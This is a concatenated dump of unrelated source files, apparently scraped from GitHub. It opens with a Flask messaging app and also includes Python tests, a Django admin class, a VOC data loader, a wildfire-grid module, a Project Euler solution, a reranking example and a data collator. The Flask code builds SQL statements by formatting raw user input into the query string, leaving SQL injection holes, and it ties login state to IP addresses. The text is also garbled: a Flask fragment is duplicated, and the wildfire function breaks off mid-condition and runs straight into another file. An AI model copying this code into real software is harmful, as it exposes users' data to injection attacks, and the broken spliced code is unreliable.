###########show user home page##############\r\n@app.route('/message/home', methods = [\"GET\"])\r\ndef msghome():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n \r\n #get all friends\r\n stmt = 'SELECT * FROM user_friends WHERE requestedId = %s AND approved = \"1\"'\r\n param = (username,)\r\n fromMessages = DBconntctor.Select_from_DB(stmt,param)\r\n #get friend requests\r\n stmt = 'SELECT * FROM user_friends WHERE requestedId = %s AND requested = \"1\" AND approved = \"0\"'\r\n param = (username,)\r\n \r\n friendrequests = DBconntctor.Select_from_DB(stmt,param)\r\n print(friendrequests)\r\n props = {'title': 'メッセージセンター', 'msg': 'メッセージセンター'}\r\n return flask.render_template('msghome.html', props=props ,username = username,fromMessages = fromMessages,friendrequests = friendrequests)\r\n\r\n###########show message page##############\r\n@app.route(\"/message/get\", methods=[\"POST\",\"GET\"])\r\ndef get_msg():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #if user is sending message\r\n if flask.request.method == \"POST\":\r\n content = flask.request.form[\"content\"]\r\n postTo = flask.request.form[\"postTo\"]\r\n postFrom = postTo\r\n\r\n # Check whether they are friends\r\n if(functions.check_friend(username,postTo) == False):\r\n return flask.redirect('/message/home')\r\n\r\n #check if message is empty or space\r\n if(content == \"\" or content.isspace()):\r\n return flask.redirect('/message/get?postFrom={}'.format(postFrom))\r\n \r\n #send message to user\r\n stmt = 'INSERT INTO messages (postFrom,postTo,content) VALUE (\"{}\",\"{}\",\"{}\")'.format(username,postTo,content)\r\n DBconntctor.Insert_to_DB(stmt)\r\n\r\n #get messages from user\r\n stmt = 'SELECT * FROM messages WHERE (postFrom = %s AND postTo = %s) OR (postFrom = %s AND postTo = %s)'\r\n param = (postFrom,username,username,postFrom)\r\n Messages = DBconntctor.Select_from_DB(stmt,param)\r\n\r\n return flask.render_template('resultGet.html', postFrom = postFrom,MessageContents = Messages,username = username)\r\n \r\n else:\r\n postTo = flask.request.args.get(\"postFrom\")\r\n postFrom = postTo\r\n\r\n # Check whether they are friends\r\n if(functions.check_friend(username,postTo) == False):\r\n return flask.redirect('/message/home')\r\n\r\n #get messages from user\r\n stmt = 'SELECT * FROM messages WHERE (postFrom = %s AND postTo = %s) OR (postFrom = %s AND postTo = %s)'\r\n param = (postFrom,username,username,postFrom)\r\n Messages = DBconntctor.Select_from_DB(stmt,param)\r\n\r\n return flask.render_template('resultGet.html', postFrom = postFrom,MessageContents = Messages,username = username)\r\n\r\n\r\n###########show group index page##############\r\n@app.route(\"/group\",methods = [\"GET\",\"POST\"])\r\ndef group_home():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n \r\n #if method is get\r\n if flask.request.method == \"GET\":\r\n #get all groups\r\n stmt = 'SELECT * FROM users_groups WHERE userId = %s'\r\n param = (username,)\r\n Groups = DBconntctor.Select_from_DB(stmt,param)\r\n\r\n return flask.render_template('group.html',username = username,props = \"グループ作成\", fromGroups = Groups)\r\n\r\n\r\n###########route for creating group##############\r\n@app.route(\"/group/create\",methods = [\"POST\"])\r\ndef create_group():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #register group\r\n groupname = flask.request.form[\"groupname\"]\r\n stmt = 'Insert INTO group_rooms (name,owner) VALUE (\"{}\",\"{}\")'.format(groupname,username)\r\n DBconntctor.Insert_to_DB(stmt)\r\n stmt = 'SELECT id FROM group_rooms WHERE name = %s AND owner = %s LIMIT 1'\r\n param = (groupname,username)\r\n group = DBconntctor.Select_from_DB(stmt,param)\r\n groupid = group[0][0]\r\n stmt = 'INSERT INTO users_groups (group_name,userID,groupID) VALUE (\"{}\",\"{}\",\"{}\")'.format(groupname,username,groupid)\r\n DBconntctor.Insert_to_DB(stmt)\r\n\r\n return flask.redirect('/group')\r\n\r\n\r\n###########show group page##############\r\n@app.route(\"/group/show\",methods = [\"get\"])\r\ndef show_group():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #get group messages and members\r\n groupid = flask.request.args.get(\"groupid\")\r\n groupname = flask.request.args.get(\"groupname\")\r\n stmt = 'SELECT * FROM groups_massages WHERE groupId = %s'\r\n param = (groupid,)\r\n messages = DBconntctor.Select_from_DB(stmt,param)\r\n stmt = 'SELECT * FROM users_groups WHERE groupID = %s'\r\n param = (groupid,)\r\n users = DBconntctor.Select_from_DB(stmt,param)\r\n\r\n # Check whether the user actually belongs to the group\r\n print(users)\r\n for user in users:\r\n if user[2] == username:\r\n return flask.render_template('group_show.html',props = \"グループ\", groupname = groupname,users = users,groupid = groupid,MessageContents = messages, username = username)\r\n \r\n return flask.redirect('/group')\r\n \r\n\r\n\r\n###########route for sending message to group##############\r\n@app.route(\"/group/send\",methods = [\"POST\"])\r\ndef send_group():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #send message to group\r\n groupid = flask.request.form[\"groupid\"]\r\n groupname = flask.request.form[\"groupname\"]\r\n content = flask.request.form[\"content\"]\r\n sendername = username\r\n stmt = 'INSERT INTO groups_massages (groupID,content,sendername) VALUE (\"{}\",\"{}\",\"{}\")'.format(groupid,content,sendername)\r\n DBconntctor.Insert_to_DB(stmt)\r\n\r\n return flask.redirect('/group/show?groupid={}&groupname={}'.format(groupid,groupname))\r\n\r\n\r\n###########route for adding user to group##############\r\n@app.route(\"/group/adduser\",methods = [\"POST\"])\r\ndef add_user_to_group():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #add user to group\r\n groupid = flask.request.form[\"groupid\"]\r\n groupname = flask.request.form[\"groupname\"]\r\n userid = flask.request.form[\"added_username\"]\r\n stmt = 'INSERT INTO users_groups (group_name,userID,groupID) VALUE (\"{}\",\"{}\",\"{}\")'.format(groupname,userid,groupid)\r\n DBconntctor.Insert_to_DB(stmt)\r\n\r\n return flask.redirect('/group/show?groupid={}&groupname={}'.format(groupid,groupname))\r\n\r\n\r\n
(\"{}\",\"{}\",\"{}\")'.format(groupname,userid,groupid)\r\n DBconntctor.Insert_to_DB(stmt)\r\n\r\n return flask.redirect('/group/show?groupid={}&groupname={}'.format(groupid,groupname))\r\n\r\n\r\n###########show edit user info page##############\r\n@app.route(\"/userinfo/edit\",methods = [\"GET\",\"POST\"])\r\ndef edit_user_info():\r\n \r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #if method is get\r\n if flask.request.method == \"GET\":\r\n stmt = 'SELECT COUNT(id) FROM user_info WHERE userId = %s'\r\n param = (username,)\r\n count = DBconntctor.Select_from_DB(stmt,param)\r\n if count[0][0] > 0:\r\n #get user info\r\n stmt = 'SELECT * FROM user_info WHERE userId = %s'\r\n param = (username,)\r\n userinfo = DBconntctor.Select_from_DB(stmt,param)\r\n #print(userinfo)\r\n return flask.render_template('edit_user_info.html',username = username,props = \"ユ��ザー情報編集\",userinfo = userinfo)\r\n else:\r\n print(\"no user info\")\r\n return flask.render_template('edit_user_info_initial.html',username = username,props = \"ユーザー情報編集\")\r\n \r\n #if method is post\r\n if flask.request.method == \"POST\":\r\n comment = flask.request.form[\"comment\"]\r\n birthday = flask.request.form[\"birthday\"]\r\n twitter = flask.request.form[\"twitter\"]\r\n website = flask.request.form[\"website\"]\r\n imgFile = None\r\n print(birthday)\r\n if \"file\" in flask.request.files:\r\n imgFile = flask.request.files[\"file\"]\r\n UPLOAD_FOLDER = 'Python/static/image/'\r\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\n imgFile.save(os.path.join(app.config['UPLOAD_FOLDER'], username + \".jpg\"))\r\n stmt = 'SELECT COUNT(id) FROM user_info WHERE userId = %s'\r\n param = (username,)\r\n count = DBconntctor.Select_from_DB(stmt,param)\r\n if count[0][0] > 0:\r\n #update user info\r\n if birthday == '':\r\n stmt = 'UPDATE user_info SET comment = \"{}\",twitter = \"{}\",website = \"{}\" WHERE userId = \"{}\"'.format(comment,twitter,website,username)\r\n DBconntctor.Insert_to_DB(stmt)\r\n else:\r\n stmt = 'UPDATE user_info SET comment = \"{}\",birthday = \"{}\",twitter = \"{}\",website = \"{}\" WHERE userId = \"{}\"'.format(comment,birthday,twitter,website,username)\r\n DBconntctor.Insert_to_DB(stmt)\r\n else:\r\n #insert user info\r\n if birthday == '':\r\n stmt = 'INSERT INTO user_info (userId,comment,twitter,website) VALUE (\"{}\",\"{}\",\"{}\",\"{}\")'.format(username,comment,twitter,website)\r\n DBconntctor.Insert_to_DB(stmt)\r\n else:\r\n stmt = 'INSERT INTO user_info (userId,comment,birthday,twitter,website) VALUE (\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'.format(username,comment,birthday,twitter,website)\r\n DBconntctor.Insert_to_DB(stmt)\r\n return flask.redirect('/userinfo/edit')\r\n\r\n\r\n###########show user info page##############\r\n@app.route(\"/userinfo/show\",methods = [\"GET\"])\r\ndef show_user_info():\r\n \r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n \r\n #表示したいユーザーのユーザーIDを取得\r\n infoname = flask.request.args.get(\"infoname\")\r\n stmt = 'SELECT COUNT(id) FROM user_info WHERE userId = %s'\r\n param = (infoname,)\r\n count = DBconntctor.Select_from_DB(stmt,param)\r\n friend = functions.check_friend(infoname,username)\r\n if count[0][0] > 0:\r\n #get user info\r\n stmt = 'SELECT * FROM user_info 
###########show user info page##############\r\n@app.route(\"/userinfo/show\",methods = [\"GET\"])\r\ndef show_user_info():\r\n \r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n \r\n # Get the user ID of the user whose profile should be shown\r\n infoname = flask.request.args.get(\"infoname\")\r\n stmt = 'SELECT COUNT(id) FROM user_info WHERE userId = %s'\r\n param = (infoname,)\r\n count = DBconntctor.Select_from_DB(stmt,param)\r\n friend = functions.check_friend(infoname,username)\r\n if count[0][0] > 0:\r\n #get user info\r\n stmt = 'SELECT * FROM user_info WHERE userId = %s'\r\n param = (infoname,)\r\n userinfo = DBconntctor.Select_from_DB(stmt,param)\r\n print(userinfo)\r\n return flask.render_template('show_user_info.html',username = username,props = \"ユーザープロフィール\",userinfo = userinfo,friend = friend)\r\n else:\r\n return flask.render_template('/no_user_info.html')\r\n\r\n\r\n##########route for friend request##########\r\n@app.route(\"/friend/request\",methods = [\"GET\"])\r\ndef friend_request():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n requestname = username\r\n requestedname = flask.request.args.get(\"requestedname\")\r\n\r\n #check if already requested\r\n stmt = 'SELECT COUNT(id) FROM user_friends WHERE requestedId = %s AND requestId = %s'\r\n params = (requestedname,requestname,)\r\n count = DBconntctor.Select_from_DB(stmt,params)\r\n if count[0][0] > 0:\r\n stmt = 'UPDATE user_friends SET requested = \"{}\" WHERE requestedId = \"{}\" AND requestId = \"{}\"'.format(1,requestedname,requestname)\r\n DBconntctor.Insert_to_DB(stmt)\r\n return flask.redirect('/message/home')\r\n #insert friend request\r\n stmt = 'INSERT INTO user_friends (requestedId,requestId,requested) VALUE (\"{}\",\"{}\",\"{}\")'.format(requestedname,requestname,1)\r\n DBconntctor.Insert_to_DB(stmt)\r\n print(stmt)\r\n return flask.redirect('/message/home')\r\n\r\n\r\n##########route for approve friend request##########\r\n@app.route(\"/friend/approve\",methods = [\"GET\"])\r\ndef friend_approve():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n requestedname = username\r\n requestname = flask.request.args.get(\"requestid\")\r\n\r\n #approve the friend request\r\n stmt = 'UPDATE user_friends SET approved = \"{}\" WHERE requestedId = \"{}\" AND requestId = \"{}\"'.format(1,requestedname,requestname)\r\n DBconntctor.Insert_to_DB(stmt)\r\n stmt = 'INSERT INTO user_friends (requestedId,requestId,approved) VALUE (\"{}\",\"{}\",\"{}\")'.format(requestname,requestedname,1)\r\n DBconntctor.Insert_to_DB(stmt)\r\n return flask.redirect('/message/home')\r\n\r\n##########route for reject friend request##########\r\n@app.route(\"/friend/reject\",methods = [\"GET\"])\r\ndef friend_reject():\r\n \r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n \r\n requestedname = username\r\n requestname = flask.request.args.get(\"requestid\")\r\n \r\n #reject the friend request\r\n stmt = 'UPDATE user_friends SET requested = \"{}\" WHERE requestedId = \"{}\" AND requestId = \"{}\"'.format(0,requestedname,requestname)\r\n DBconntctor.Insert_to_DB(stmt)\r\n return flask.redirect('/message/home')\r\n\r\n\r\nif __name__ == '__main__':\r\n socketio.run(app,debug=False,host='192.168.0.50',port=443,ssl_context=context) \r\n # serve(app,socketio,debug = True,host='192.168.0.50',post=443,ssl_context = context)","repo_name":"TAMIYANOMAR/Python_Flask_Message_Centeer","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":21449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"36377183202","text":"import unittest\r\nimport os.path as osp\r\n\r\nfrom 
pylinac.core.utilities import *\r\n\r\n\r\nclass TestUtilities(unittest.TestCase):\r\n\r\n def test_isnumeric(self):\r\n # test numerics\r\n numerics = (5, 3.2, np.array((5,6))[0])\r\n for number in numerics:\r\n self.assertTrue(isnumeric(number))\r\n\r\n # test non-numerics\r\n notnumerics = ('5', np.array((5,6)))\r\n for notnumeric in notnumerics:\r\n self.assertFalse(isnumeric(notnumeric))\r\n\r\n def test_is_iterable(self):\r\n # test iterables\r\n iters = ((1,2,'t'), [4, 8, 'r'], np.array((5,6,7)))\r\n for iter in iters:\r\n self.assertTrue(is_iterable(iter))\r\n # test non-iterables\r\n noniters = (5,)\r\n for iter in noniters:\r\n self.assertFalse(is_iterable(iter))\r\n\r\n def test_is_dicom(self):\r\n \"\"\"Test the is_dicom function.\"\"\"\r\n \r\n test_file = osp.join(osp.dirname(osp.dirname(__file__)), 'test_files', 'VMAT', 'DRGSdmlc-105-example.dcm')\r\n invalid_file = test_file.replace('DR', 'DR_')\r\n notdicom_file = osp.abspath(__file__)\r\n\r\n # valid file returns True\r\n self.assertTrue(is_dicom(test_file))\r\n\r\n # return false for real file but not dicom\r\n self.assertFalse(is_dicom(notdicom_file))\r\n\r\n # test invalid path\r\n self.assertRaises(IOError, is_dicom, invalid_file)\r\n\r\n def test_typed_property(self):\r\n\r\n class DumbClass:\r\n intprop = typed_property('dumbprop', int)\r\n floatstrprop = typed_property('floatstrprop', (float, str))\r\n\r\n dc = DumbClass()\r\n\r\n # test the intprop\r\n self.assertIsNone(dc.intprop)\r\n dc.intprop = 3\r\n self.assertEqual(dc.intprop, 3)\r\n self.assertRaises(TypeError, setattr, dc, 'intprop', 1.0)\r\n\r\n # test the intstrprop\r\n dc.floatstrprop = 3.3\r\n self.assertEqual(dc.floatstrprop, 3.3)\r\n dc.floatstrprop = 'mystring'\r\n self.assertEqual(dc.floatstrprop, dc._floatstrprop)\r\n self.assertRaises(TypeError, setattr, dc, 'floatstrprop', 3)\r\n\r\n","repo_name":"vandonova/amazon_art","sub_path":"lib/python3.5/site-packages/tests/core/test_utilities.py","file_name":"test_utilities.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"41837498465","text":"from django.contrib import admin\nfrom .models import Booking\nfrom django_summernote.admin import SummernoteModelAdmin\n\n\n@admin.register(Booking)\nclass BookingAdmin(SummernoteModelAdmin):\n \"\"\"\n Adds 'Bookings' to the admin panel where an admin can view all bookings\n Features added to view certain information in a list,\n Search for specific elements\n A filter to quickly check bookings within that filter\n And fields for textareas so they are more customizable and clearly\n visible when viewing a booking\n \"\"\"\n list_display = (\n 'first_name',\n 'last_name',\n 'email',\n 'date',\n 'time',\n 'project_type'\n )\n search_fields = (\n 'first_name',\n 'last_name',\n 'email',\n 'project_type'\n )\n list_filter = (\n 'first_name',\n 'last_name',\n 'email',\n 'date',\n 'time',\n 'project_type'\n )\n summernote_fields = (\n 'project_type',\n 'project_details'\n )\n","repo_name":"BjornRodin/book-a-contractor","sub_path":"booking/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24137037603","text":"from random import randint\n\n\nguess = int(input(\"Guess a number between 1 and 10: \"))\nnumber = randint(1,10)\n\nwhile guess != number:\n if guess < number:\n guess = int(input(\"Too low, try again: \"))\n elif guess > 
number:\n guess = int(input(\"Too high, try again: \"))\n if guess == number:\n print(\"Winner!\")\n play_again = input(\"Do you want to keep playing? (y/n) \")\n play_again = play_again.lower()\n if play_again == \"y\":\n guess = int(input(\"Guess a number between 1 and 10: \"))\n number = randint(1,10)\n elif play_again == \"n\":\n print(\"OK, cya next time!\")\n elif play_again == \"stop\":\n print(\"OK, I'll stop.\")\n break\n else:\n print(\"Sry, I don't understand that.\")\n\n","repo_name":"thispassing/learningPython","sub_path":"guessing.py","file_name":"guessing.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"74741018064","text":"from bs4 import BeautifulSoup\nimport numpy as np\nfrom os import path\n\nfrom .config import VOC_CLASSES\n\n\ndef parse_annotations(xml_path, keep_difficult=False, return_difficulty=False):\n with open(xml_path, 'r') as f:\n annotation = BeautifulSoup(f, 'xml')\n\n bboxes = []\n\n for obj in annotation.find_all('object'):\n difficulty = int(obj.difficult.text)\n\n if difficulty and not keep_difficult:\n continue\n\n label = obj.find('name').text\n xmin = float(obj.bndbox.xmin.text) - 1\n ymin = float(obj.bndbox.ymin.text) - 1\n xmax = float(obj.bndbox.xmax.text) - 1\n ymax = float(obj.bndbox.ymax.text) - 1\n box = [xmin, ymin, xmax, ymax, VOC_CLASSES.index(label)]\n\n if return_difficulty:\n box.append(difficulty)\n bboxes.append(box)\n\n return np.array(bboxes, np.int32)\n\n\ndef load_voc_dataset(dataroot='./data/VOCdevkit',\n splits=[('VOC2007', 'trainval'), ('VOC2012', 'trainval')],\n keep_difficult=False,\n return_difficulty=False):\n img_paths, bboxes = [], []\n for year, split in splits:\n ids_file = path.join(\n dataroot, year, 'ImageSets', 'Main', split + '.txt')\n with open(ids_file, 'r') as f:\n ids = [line.strip() for line in f.readlines()]\n\n img_paths += [path.join(dataroot, year, 'JPEGImages', id+'.jpg')\n for id in ids]\n bboxes += [parse_annotations(path.join(dataroot, year,\n 'Annotations', id+'.xml'),\n keep_difficult=keep_difficult,\n return_difficulty=return_difficulty)\n for id in ids]\n return np.array(img_paths), np.array(bboxes)\n","repo_name":"Leonardo-Blanger/RefineDet_TensorFlow","sub_path":"voc/voc_data_loader.py","file_name":"voc_data_loader.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"}
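A quick usage sketch for the loader above; the dataroot follows the function's own default, and the directory is assumed to hold an extracted VOC2007 devkit:

# Assumes ./data/VOCdevkit/VOC2007 exists with the usual layout.
img_paths, bboxes = load_voc_dataset(
    dataroot='./data/VOCdevkit',
    splits=[('VOC2007', 'trainval')],
    keep_difficult=False,
)
print(img_paths.shape)  # one path per image id
print(bboxes[0][:3])    # rows of [xmin, ymin, xmax, ymax, class_index]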
+{"seq_id":"17189558395","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis file contains the functions that are useful in order to run the Main\r\n\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n# Importing the libraries\r\n#------------------------------------------------------------------------------\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import colors\r\nimport numpy as np\r\nimport rasterio\r\nimport os\r\nimport copy\r\n\r\n#------------------------------------------------------------------------------\r\n# Export the result in a .TIF\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef ExportResult(Burned,sizeR,sizeC):\r\n path = os.getcwd()\r\n \r\n Seed_file = \"\\\\images\\seed_binary.tif\"\r\n SeedTif=rasterio.open(path+Seed_file)\r\n \r\n \r\n Seed_array = SeedTif.read()\r\n Result=copy.deepcopy(Seed_array[:,0:sizeR,0:sizeC])\r\n Result[0]=Burned\r\n \r\n Result_File=\"\\images\\Result.tif\"\r\n Result_File_Out=path+Result_File\r\n \r\n with rasterio.open(Result_File_Out,\r\n 'w', \r\n driver = SeedTif.meta['driver'],\r\n height = sizeR,\r\n width= sizeC,\r\n count=SeedTif.meta['count'],\r\n crs=SeedTif.meta['crs'],\r\n transform=SeedTif.meta['transform'],\r\n dtype= SeedTif.meta['dtype'],\r\n nodata= SeedTif.meta['nodata']) as destination:\r\n destination.write(Result)\r\n \r\n SeedTif.close()\r\n \r\n return\r\n\r\n\r\n#------------------------------------------------------------------------------\r\n# Importing the input as a binary matrix starting from a .TIF\r\n#------------------------------------------------------------------------------\r\n\r\ndef TakeImage(sizeR,sizeC):\r\n \r\n from PIL import Image\r\n im_Seed = Image.open('images/seed_binary.tif')\r\n imarray_Seed = np.array(im_Seed)\r\n \r\n im_Grow = Image.open('images/grow_binary.tif')\r\n imarray_Grow = np.array(im_Grow)\r\n \r\n im_Result = Image.open('images/result_binary.tif')\r\n \r\n imarray_Result = np.array(im_Result)\r\n \r\n Seed=imarray_Seed[0:sizeR,0:sizeC]\r\n Grow=imarray_Grow[0:sizeR,0:sizeC]\r\n Result=imarray_Result[0:sizeR,0:sizeC]\r\n \r\n return Seed, Grow, Result\r\n \r\n\r\n#------------------------------------------------------------------------------\r\n# Plot a color grid reading the value in the matrix: \r\n# 0 (unburned, green)\r\n# 1 (burned, red)\r\n#------------------------------------------------------------------------------\r\n\r\ndef ColorGrid(data,sizeR,sizeC):\r\n\r\n # create discrete colormap\r\n cmap = colors.ListedColormap(['green', 'red','blue'])\r\n bounds = [0,0.5,1.5,2]\r\n norm = colors.BoundaryNorm(bounds, cmap.N)\r\n\r\n fig, ax = plt.subplots()\r\n ax.imshow(data, cmap=cmap, norm=norm)\r\n\r\n # draw gridlines\r\n # ax.grid(which='major', axis='both', linestyle='-', color='k', linewidth=2)\r\n # ax.set_xticks(np.arange(0.5, size, 1));\r\n # ax.set_yticks(np.arange(0.5, size, 1));\r\n\r\n plt.show()\r\n \r\n \r\n#------------------------------------------------------------------------------\r\n# Look for the 8 neighbors of a pixel, in our case the pixel in question\r\n# is a seed and we select its neighbors\r\n#------------------------------------------------------------------------------\r\n\r\n# copy() is necessary, otherwise python creates a reference rather than a copy,\r\n# and with arrays modifying one would modify the other too\r\n\r\ndef CercaVicini(Raster,sizeR,sizeC):\r\n \r\n MatriceVicini=Raster[:,:].copy()\r\n \r\n #set the seed's neighbours to 1 \r\n #row\r\n for j in range(sizeR): \r\n #column\r\n for k in range(sizeC):\r\n \r\n #element inside the matrix\r\n if Raster[j,k]==1 and j>0 and j<sizeR-1 and k>0 and k<sizeC-1:\r\n MatriceVicini[j-1:j+2,k-1:k+2]=1\r\n #element on an edge or corner: clamp the neighbourhood to the grid\r\n elif Raster[j,k]==1:\r\n MatriceVicini[max(j-1,0):j+2,max(k-1,0):k+2]=1\r\n \r\n return MatriceVicini\n\nimport time\n\nones_list = ['', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine']\nteens_list = ['ten', 'eleven', 'twelve', 'thirteen', 'fourteen', 'fifteen', 'sixteen',\n 'seventeen', 'eighteen', 'nineteen']\ntens_list = ['', '', 'twenty', 'thirty', 'forty', 'fifty', 'sixty', 'seventy', 'eighty', 'ninety']\n\n\ndef wordify(n: int) -> str:\n \"\"\"Converts an integer into an English string.\"\"\"\n string = ''\n temp_num = n\n\n if temp_num // 1000:\n string += ones_list[temp_num // 1000] + ' thousand '\n temp_num = temp_num % 1000\n\n if temp_num // 100:\n string += ones_list[temp_num // 100] + ' hundred '\n temp_num = temp_num % 100\n\n if n > 100 and n % 100:\n string += 'and '\n\n if temp_num // 10 > 1:\n string += tens_list[temp_num // 10] + ' '\n temp_num = temp_num % 10\n string += ones_list[temp_num]\n\n elif temp_num // 10 == 1:\n string += teens_list[temp_num-10]\n\n else:\n temp_num = temp_num % 10\n string += ones_list[temp_num]\n\n return string\n\n\ndef sum_of_chars_upto(n: int) -> int:\n \"\"\" Sums up the number of characters in all the numbers upto n.\"\"\"\n total = 0\n for i in range(1, n+1):\n total += len(wordify(i).replace(' ', ''))\n return total\n\n\nif __name__ == '__main__':\n t0 = time.time()\n print(sum_of_chars_upto(1000))\n print('Solved in {} seconds using {}'.format(time.time()-t0, 
sum_of_chars_upto.__name__))\n","repo_name":"ranajaydas/projecteuler","sub_path":"euler017.py","file_name":"euler017.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
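The two worked examples from the Project Euler 17 statement double as a sanity check for letter-counting code like the record above; spaces and hyphens are not counted:

# 342 -> "three hundred and forty-two" has 23 letters,
# 115 -> "one hundred and fifteen" has 20 letters.
assert len('threehundredandfortytwo') == 23
assert len('onehundredandfifteen') == 20
# And the first five numbers (one two three four five) total 19 letters.
assert len('onetwothreefourfive') == 19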
This might take a while\")\n corpus_embeddings = model.encode(corpus_sentences, show_progress_bar=True, convert_to_tensor=True, num_workers=2)\n\n print(\"Store file on disc\")\n with open(embedding_cache_path, \"wb\") as fOut:\n pickle.dump({'sentences': corpus_sentences, 'embeddings': corpus_embeddings}, fOut)\nelse:\n print(\"Load pre-computed embeddings from disc\")\n with open(embedding_cache_path, \"rb\") as fIn:\n cache_data = pickle.load(fIn)\n corpus_sentences = cache_data['sentences'][0:max_corpus_size]\n corpus_embeddings = cache_data['embeddings'][0:max_corpus_size]\n\n###############################\nprint(\"Corpus loaded with {} sentences / embeddings\".format(len(corpus_sentences)))\n\nwhile True:\n inp_question = input(\"Please enter a question: \")\n print(\"Input question:\", inp_question)\n\n #First, retrieve candidates using cosine similarity search\n start_time = time.time()\n question_embedding = model.encode(inp_question, convert_to_tensor=True)\n hits = util.semantic_search(question_embedding, corpus_embeddings, top_k=num_candidates)\n hits = hits[0] #Get the hits for the first query\n\n print(\"Cosine-Similarity search took {:.3f} seconds\".format(time.time()-start_time))\n print(\"Top 5 hits with cosine-similarity:\")\n for hit in hits[0:5]:\n print(\"\\t{:.3f}\\t{}\".format(hit['score'], corpus_sentences[hit['corpus_id']]))\n\n\n #Now, do the re-ranking with the cross-encoder\n start_time = time.time()\n sentence_pairs = [[inp_question, corpus_sentences[hit['corpus_id']]] for hit in hits]\n ce_scores = cross_encoder_model.predict(sentence_pairs)\n\n for idx in range(len(hits)):\n hits[idx]['cross-encoder_score'] = ce_scores[idx]\n\n #Sort list by CrossEncoder scores\n hits = sorted(hits, key=lambda x: x['cross-encoder_score'], reverse=True)\n print(\"\\nRe-ranking with Cross-Encoder took {:.3f} seconds\".format(time.time() - start_time))\n print(\"Top 5 hits with CrossEncoder:\")\n for hit in hits[0:5]:\n print(\"\\t{:.3f}\\t{}\".format(hit['cross-encoder_score'], corpus_sentences[hit['corpus_id']]))\n\n print(\"\\n\\n========\\n\")\n","repo_name":"UKPLab/sentence-transformers","sub_path":"examples/applications/cross-encoder/cross-encoder_reranking.py","file_name":"cross-encoder_reranking.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","stars":12439,"dataset":"github-code","pt":"48"} +{"seq_id":"30497101445","text":"from typing import Dict, Optional, Any\n\nfrom ..data_collator import DataCollator\nfrom ..dynamic_padding import DynamicPaddingDataCollator\n\n\ndef generalize_labels_key(batch, label_keys=(\"label\", \"label_ids\")):\n for key in label_keys:\n if key in batch:\n batch[\"labels\"] = batch.pop(key, None)\n\n return batch\n\nclass DefaultDataCollator(DataCollator):\n def collate(self, batch):\n return generalize_labels_key(batch)\n \nclass HuggingFaceDataCollatorWrapper:\n def __init__(\n self, \n tokenizer, \n additional_mapping: Optional[Dict[str, Any]] = None, \n pad_to_multiple_of=None,\n ignore_missing_keys=False,\n **args,\n ):\n self.tokenizer = tokenizer\n self.additional_mapping = additional_mapping\n\n if self.additional_mapping is None:\n self.additional_mapping = {}\n\n self.mapping = {\n \"input_ids\": self.tokenizer.pad_token_id,\n \"attention_mask\": 0,\n \"token_type_ids\": self.tokenizer.pad_token_type_id,\n \"offset_mapping\": (0, 0),\n }.update(self.additional_mapping)\n\n self.padding_side = 